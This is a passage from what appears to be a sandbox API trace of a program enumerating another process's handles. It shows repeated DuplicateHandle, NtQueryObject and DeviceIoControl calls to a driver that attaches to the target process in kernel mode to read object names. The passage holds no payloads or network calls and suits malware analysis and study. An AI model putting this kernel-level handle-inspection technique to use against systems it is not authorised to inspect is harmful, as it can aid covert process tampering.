ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0252.765] NtQueryObject (in: Handle=0x19c, ObjectInformationClass=0x2, ObjectInformation=0x2ed480, ObjectInformationLength=0x70, ReturnLength=0x0 | out: ObjectInformation=0x2ed480, ReturnLength=0x0) returned 0x0 [0252.765] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314ec0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x314ec0*, lpBytesReturned=0x14d450*=0xdc, lpOverlapped=0x0) returned 1 [0252.765] PsLookupProcessByProcessId (in: ProcessId=0x190, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0252.765] PsAcquireProcessExitSynchronization () returned 0x0 [0252.765] KeStackAttachProcess (in: PROCESS=0xffffe0006a5c0080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006a5c0080, ApcState=0xffffd000b1b8e400) [0252.765] ObReferenceObjectByHandle (in: Handle=0xb8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014dd1ba90, HandleInformation=0x0) returned 0x0 [0252.765] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0252.765] PsReleaseProcessExitSynchronization () returned 0x2 [0252.765] ObfDereferenceObject (Object=0xffffe0006a5c0080) returned 0x27feb [0252.765] ObQueryNameString (in: Object=0xffffc0014dd1ba90, ObjectNameInfo=0xffffe0006843c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006843c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0252.765] ObfDereferenceObject (Object=0xffffc0014dd1ba90) returned 0xfffb [0252.765] IoCompleteRequest () returned 0x0 [0252.765] CloseHandle (hObject=0x19c) returned 1 [0252.765] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x190) returned 0x19c [0252.765] GetCurrentProcess () returned 0xffffffffffffffff [0252.765] DuplicateHandle (in: hSourceProcessHandle=0x19c, hSourceHandle=0xb4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x0) returned 0 [0252.765] CloseHandle (hObject=0x19c) returned 1 [0252.765] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x8335004c, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2ed480, nOutBufferSize=0x88, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2ed480*, lpBytesReturned=0x14d450*=0x28, lpOverlapped=0x0) returned 1 [0252.765] PsLookupProcessByProcessId (in: ProcessId=0x190, Process=0xffffd000b1b8e3d8 | out: Process=0xffffd000b1b8e3d8) returned 0x0 [0252.765] PsAcquireProcessExitSynchronization () returned 0x0 [0252.765] KeStackAttachProcess (in: PROCESS=0xffffe0006a5c0080, ApcState=0xffffd000b1b8e3f8 | out: PROCESS=0xffffe0006a5c0080, ApcState=0xffffd000b1b8e3f8) [0252.765] ObReferenceObjectByHandle (in: Handle=0xb4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e3e0, HandleInformation=0x0 | out: Object=0xffffd000b1b8e3e0*=0xffffe0006a3714b0, HandleInformation=0x0) returned 0x0 [0252.765] PsReleaseProcessExitSynchronization () returned 0x2 [0252.765] ObfDereferenceObject (Object=0xffffe0006a5c0080) returned 0x27fe9 [0252.765] ZwQueryObject (in: Handle=0xb4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0xffffd000b1b8e3d4 | out: ObjectInformation=0x0, ReturnLength=0xffffd000b1b8e3d4) returned 0xc0000004 [0252.765] ExAllocatePoolWithTag (PoolType=0x1, NumberOfBytes=0x88, Tag=0x58637250) returned 0xffffc0014a23eb00 [0252.765] ZwQueryObject (in: Handle=0xb4, ObjectInformationClass=0x2, ObjectInformation=0xffffc0014a23eb00, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0xffffc0014a23eb00, ReturnLength=0x0) returned 0x0 [0252.765] ExFreePoolWithTag (P=0xffffc0014a23eb00, Tag=0x0) [0252.765] ObfDereferenceObject (Object=0xffffe0006a3714b0) returned 0x7ffe [0252.765] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e3f8) [0252.765] IoCompleteRequest () returned 0x0 [0252.766] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314ec0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x314ec0*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0252.766] PsLookupProcessByProcessId (in: ProcessId=0x190, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0252.766] PsAcquireProcessExitSynchronization () returned 0x0 [0252.766] KeStackAttachProcess (in: PROCESS=0xffffe0006a5c0080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006a5c0080, ApcState=0xffffd000b1b8e400) [0252.766] ObReferenceObjectByHandle (in: Handle=0xb4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a3714b0, HandleInformation=0x0) returned 0x0 [0252.766] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0252.766] PsReleaseProcessExitSynchronization () returned 0x2 [0252.766] ObfDereferenceObject (Object=0xffffe0006a5c0080) returned 0x27fe8 [0252.766] ObQueryNameString (in: Object=0xffffe0006a3714b0, ObjectNameInfo=0xffffe000684837c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000684837c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0252.766] ObfDereferenceObject (Object=0xffffe0006a3714b0) returned 0x7ffd [0252.766] IoCompleteRequest () returned 0x0 [0252.766] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x190) returned 0x19c [0252.766] GetCurrentProcess () returned 0xffffffffffffffff [0252.766] DuplicateHandle (in: hSourceProcessHandle=0x19c, hSourceHandle=0xb0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x1a0) returned 1 [0252.766] CloseHandle (hObject=0x19c) returned 1 [0252.766] NtQueryObject (in: Handle=0x1a0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0252.766] NtQueryObject (in: Handle=0x1a0, ObjectInformationClass=0x2, ObjectInformation=0x2ed480, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2ed480, ReturnLength=0x0) returned 0x0 [0252.766] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314ec0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x314ec0*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0252.766] PsLookupProcessByProcessId (in: ProcessId=0x190, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0252.766] PsAcquireProcessExitSynchronization () returned 0x0 [0252.766] KeStackAttachProcess (in: PROCESS=0xffffe0006a5c0080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006a5c0080, ApcState=0xffffd000b1b8e400) [0252.766] ObReferenceObjectByHandle (in: Handle=0xb0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014a3e7170, HandleInformation=0x0) returned 0x0 [0252.766] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0252.766] PsReleaseProcessExitSynchronization () returned 0x2 [0252.766] ObfDereferenceObject (Object=0xffffe0006a5c0080) returned 0x27fe6 [0252.766] ObQueryNameString (in: Object=0xffffc0014a3e7170, ObjectNameInfo=0xffffe0006847f044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006847f044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0252.766] ObfDereferenceObject (Object=0xffffc0014a3e7170) returned 0x10000 [0252.766] IoCompleteRequest () returned 0x0 [0252.766] CloseHandle (hObject=0x1a0) returned 1 [0252.766] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x190) returned 0x1a0 [0252.766] GetCurrentProcess () returned 0xffffffffffffffff [0252.766] DuplicateHandle (in: hSourceProcessHandle=0x1a0, hSourceHandle=0xa8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x19c) returned 1 [0252.766] CloseHandle (hObject=0x1a0) returned 1 [0252.767] NtQueryObject (in: Handle=0x19c, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0252.767] NtQueryObject (in: Handle=0x19c, ObjectInformationClass=0x2, ObjectInformation=0x2ed480, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2ed480, ReturnLength=0x0) returned 0x0 [0252.767] NtQueryInformationProcess (in: ProcessHandle=0x19c, ProcessInformationClass=0x0, ProcessInformation=0x14d538, ProcessInformationLength=0x30, ReturnLength=0x14d4b0 | out: ProcessInformation=0x14d538, ReturnLength=0x14d4b0) returned 0xc0000022 [0252.767] CloseHandle (hObject=0x19c) returned 1 [0252.767] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x190) returned 0x19c [0252.767] GetCurrentProcess () returned 0xffffffffffffffff [0252.767] DuplicateHandle (in: hSourceProcessHandle=0x19c, hSourceHandle=0xa4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x1a0) returned 1 [0252.767] CloseHandle (hObject=0x19c) returned 1 [0252.767] NtQueryObject (in: Handle=0x1a0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0252.767] NtQueryObject (in: Handle=0x1a0, ObjectInformationClass=0x2, ObjectInformation=0x2ed480, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2ed480, ReturnLength=0x0) returned 0x0 [0252.767] NtQueryInformationThread (in: ThreadHandle=0x1a0, ThreadInformationClass=0x0, ThreadInformation=0x14d508, ThreadInformationLength=0x30, ReturnLength=0x14d4b0 | out: ThreadInformation=0x14d508, ReturnLength=0x14d4b0) returned 0xc0000022 [0252.767] CloseHandle (hObject=0x1a0) returned 1 [0252.767] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x190) returned 0x1a0 [0252.767] GetCurrentProcess () returned 0xffffffffffffffff [0252.767] DuplicateHandle (in: hSourceProcessHandle=0x1a0, hSourceHandle=0x7c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x19c) returned 1 [0252.767] CloseHandle (hObject=0x1a0) returned 1 [0252.767] NtQueryObject (in: Handle=0x19c, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0252.767] NtQueryObject (in: Handle=0x19c, ObjectInformationClass=0x2, ObjectInformation=0x2ed480, ObjectInformationLength=0x98, ReturnLength=0x0 | out: ObjectInformation=0x2ed480, ReturnLength=0x0) returned 0x0 [0252.767] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314ec0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x314ec0*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0252.767] PsLookupProcessByProcessId (in: ProcessId=0x190, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0252.767] PsAcquireProcessExitSynchronization () returned 0x0 [0252.767] KeStackAttachProcess (in: PROCESS=0xffffe0006a5c0080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006a5c0080, ApcState=0xffffd000b1b8e400) [0252.767] ObReferenceObjectByHandle (in: Handle=0x7c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006977bba0, HandleInformation=0x0) returned 0x0 [0252.767] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0252.767] PsReleaseProcessExitSynchronization () returned 0x2 [0252.767] ObfDereferenceObject (Object=0xffffe0006a5c0080) returned 0x27fe2 [0252.767] ObQueryNameString (in: Object=0xffffe0006977bba0, ObjectNameInfo=0xffffe000685023c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000685023c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0252.767] ObfDereferenceObject (Object=0xffffe0006977bba0) returned 0xffff [0252.767] IoCompleteRequest () returned 0x0 [0252.767] CloseHandle (hObject=0x19c) returned 1 [0252.767] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x190) returned 0x19c [0252.767] GetCurrentProcess () returned 0xffffffffffffffff [0252.767] DuplicateHandle (in: hSourceProcessHandle=0x19c, hSourceHandle=0x78, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x1a0) returned 1 [0252.767] CloseHandle (hObject=0x19c) returned 1 [0252.768] NtQueryObject (in: Handle=0x1a0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0252.768] NtQueryObject (in: Handle=0x1a0, ObjectInformationClass=0x2, ObjectInformation=0x2ed480, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2ed480, ReturnLength=0x0) returned 0x0 [0252.768] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314ec0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x314ec0*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0252.768] PsLookupProcessByProcessId (in: ProcessId=0x190, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0252.768] PsAcquireProcessExitSynchronization () returned 0x0 [0252.768] KeStackAttachProcess (in: PROCESS=0xffffe0006a5c0080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006a5c0080, ApcState=0xffffd000b1b8e400) [0252.768] ObReferenceObjectByHandle (in: Handle=0x78, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000684862b0, HandleInformation=0x0) returned 0x0 [0252.768] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0252.768] PsReleaseProcessExitSynchronization () returned 0x2 [0252.768] ObfDereferenceObject (Object=0xffffe0006a5c0080) returned 0x27fe0 [0252.768] ObQueryNameString (in: Object=0xffffe000684862b0, ObjectNameInfo=0xffffe0006843c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006843c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0252.768] ObfDereferenceObject (Object=0xffffe000684862b0) returned 0xffff [0252.768] IoCompleteRequest () returned 0x0 [0252.768] CloseHandle (hObject=0x1a0) returned 1 [0252.768] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x190) returned 0x1a0 [0252.768] GetCurrentProcess () returned 0xffffffffffffffff [0252.768] DuplicateHandle (in: hSourceProcessHandle=0x1a0, hSourceHandle=0x6c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x19c) returned 1 [0252.768] CloseHandle (hObject=0x1a0) returned 1 [0252.768] NtQueryObject (in: Handle=0x19c, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0252.768] NtQueryObject (in: Handle=0x19c, ObjectInformationClass=0x2, ObjectInformation=0x2ed480, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0x2ed480, ReturnLength=0x0) returned 0x0 [0252.768] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314ec0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x314ec0*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0252.768] PsLookupProcessByProcessId (in: ProcessId=0x190, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0252.768] PsAcquireProcessExitSynchronization () returned 0x0 [0252.768] KeStackAttachProcess (in: PROCESS=0xffffe0006a5c0080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006a5c0080, ApcState=0xffffd000b1b8e400) [0252.768] ObReferenceObjectByHandle (in: Handle=0x6c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a36f720, HandleInformation=0x0) returned 0x0 [0252.768] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0252.768] PsReleaseProcessExitSynchronization () returned 0x2 [0252.768] ObfDereferenceObject (Object=0xffffe0006a5c0080) returned 0x27fde [0252.768] ObQueryNameString (in: Object=0xffffe0006a36f720, ObjectNameInfo=0xffffe000684837c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000684837c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0252.768] ObfDereferenceObject (Object=0xffffe0006a36f720) returned 0xfffa [0252.768] IoCompleteRequest () returned 0x0 [0252.768] CloseHandle (hObject=0x19c) returned 1 [0252.768] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x190) returned 0x19c [0252.768] GetCurrentProcess () returned 0xffffffffffffffff [0252.768] DuplicateHandle (in: hSourceProcessHandle=0x19c, hSourceHandle=0x68, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x1a0) returned 1 [0252.768] CloseHandle (hObject=0x19c) returned 1 [0252.768] NtQueryObject (in: Handle=0x1a0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0252.769] NtQueryObject (in: Handle=0x1a0, ObjectInformationClass=0x2, ObjectInformation=0x2ed480, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0x2ed480, ReturnLength=0x0) returned 0x0 [0252.769] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314ec0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x314ec0*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0252.769] PsLookupProcessByProcessId (in: ProcessId=0x190, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0252.769] PsAcquireProcessExitSynchronization () returned 0x0 [0252.769] KeStackAttachProcess (in: PROCESS=0xffffe0006a5c0080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006a5c0080, ApcState=0xffffd000b1b8e400) [0252.769] ObReferenceObjectByHandle (in: Handle=0x68, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a365080, HandleInformation=0x0) returned 0x0 [0252.769] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0252.769] PsReleaseProcessExitSynchronization () returned 0x2 [0252.769] ObfDereferenceObject (Object=0xffffe0006a5c0080) returned 0x27fdc [0252.769] ObQueryNameString (in: Object=0xffffe0006a365080, ObjectNameInfo=0xffffe000685de044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000685de044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0252.769] ObfDereferenceObject (Object=0xffffe0006a365080) returned 0xffff [0252.769] IoCompleteRequest () returned 0x0 [0252.769] CloseHandle (hObject=0x1a0) returned 1 [0252.769] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x190) returned 0x1a0 [0252.769] GetCurrentProcess () returned 0xffffffffffffffff [0252.769] DuplicateHandle (in: hSourceProcessHandle=0x1a0, hSourceHandle=0x44, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x19c) returned 1 [0252.769] CloseHandle (hObject=0x1a0) returned 1 [0252.769] NtQueryObject (in: Handle=0x19c, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0252.769] NtQueryObject (in: Handle=0x19c, ObjectInformationClass=0x2, ObjectInformation=0x2ed480, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0x2ed480, ReturnLength=0x0) returned 0x0 [0252.769] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314ec0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x314ec0*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0252.769] PsLookupProcessByProcessId (in: ProcessId=0x190, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0252.769] PsAcquireProcessExitSynchronization () returned 0x0 [0252.769] KeStackAttachProcess (in: PROCESS=0xffffe0006a5c0080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006a5c0080, ApcState=0xffffd000b1b8e400) [0252.769] ObReferenceObjectByHandle (in: Handle=0x44, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a91d070, HandleInformation=0x0) returned 0x0 [0252.769] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0252.769] PsReleaseProcessExitSynchronization () returned 0x2 [0252.769] ObfDereferenceObject (Object=0xffffe0006a5c0080) returned 0x27fda [0252.769] ObQueryNameString (in: Object=0xffffe0006a91d070, ObjectNameInfo=0xffffe000690237c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690237c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0252.769] ObfDereferenceObject (Object=0xffffe0006a91d070) returned 0xffff [0252.769] IoCompleteRequest () returned 0x0 [0252.769] CloseHandle (hObject=0x19c) returned 1 [0252.769] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x190) returned 0x19c [0252.769] GetCurrentProcess () returned 0xffffffffffffffff [0252.769] DuplicateHandle (in: hSourceProcessHandle=0x19c, hSourceHandle=0x34, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x1a0) returned 1 [0252.769] CloseHandle (hObject=0x19c) returned 1 [0252.769] NtQueryObject (in: Handle=0x1a0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0252.769] NtQueryObject (in: Handle=0x1a0, ObjectInformationClass=0x2, ObjectInformation=0x2ed480, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2ed480, ReturnLength=0x0) returned 0x0 [0252.770] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314ec0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x314ec0*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0252.770] PsLookupProcessByProcessId (in: ProcessId=0x190, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0252.770] PsAcquireProcessExitSynchronization () returned 0x0 [0252.770] KeStackAttachProcess (in: PROCESS=0xffffe0006a5c0080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006a5c0080, ApcState=0xffffd000b1b8e400) [0252.770] ObReferenceObjectByHandle (in: Handle=0x34, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069ff58c0, HandleInformation=0x0) returned 0x0 [0252.770] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0252.770] PsReleaseProcessExitSynchronization () returned 0x2 [0252.770] ObfDereferenceObject (Object=0xffffe0006a5c0080) returned 0x27fd8 [0252.770] ObQueryNameString (in: Object=0xffffe00069ff58c0, ObjectNameInfo=0xffffe0006841e584, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006841e584, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0252.770] ObfDereferenceObject (Object=0xffffe00069ff58c0) returned 0xffff [0252.770] IoCompleteRequest () returned 0x0 [0252.770] CloseHandle (hObject=0x1a0) returned 1 [0252.770] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x190) returned 0x1a0 [0252.770] GetCurrentProcess () returned 0xffffffffffffffff [0252.770] DuplicateHandle (in: hSourceProcessHandle=0x1a0, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x19c) returned 1 [0252.770] CloseHandle (hObject=0x1a0) returned 1 [0252.770] NtQueryObject (in: Handle=0x19c, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0252.770] NtQueryObject (in: Handle=0x19c, ObjectInformationClass=0x2, ObjectInformation=0x2ed480, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0x2ed480, ReturnLength=0x0) returned 0x0 [0252.770] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314ec0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x314ec0*, lpBytesReturned=0x14d450*=0x22, lpOverlapped=0x0) returned 1 [0252.770] PsLookupProcessByProcessId (in: ProcessId=0x190, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0252.770] PsAcquireProcessExitSynchronization () returned 0x0 [0252.770] KeStackAttachProcess (in: PROCESS=0xffffe0006a5c0080, 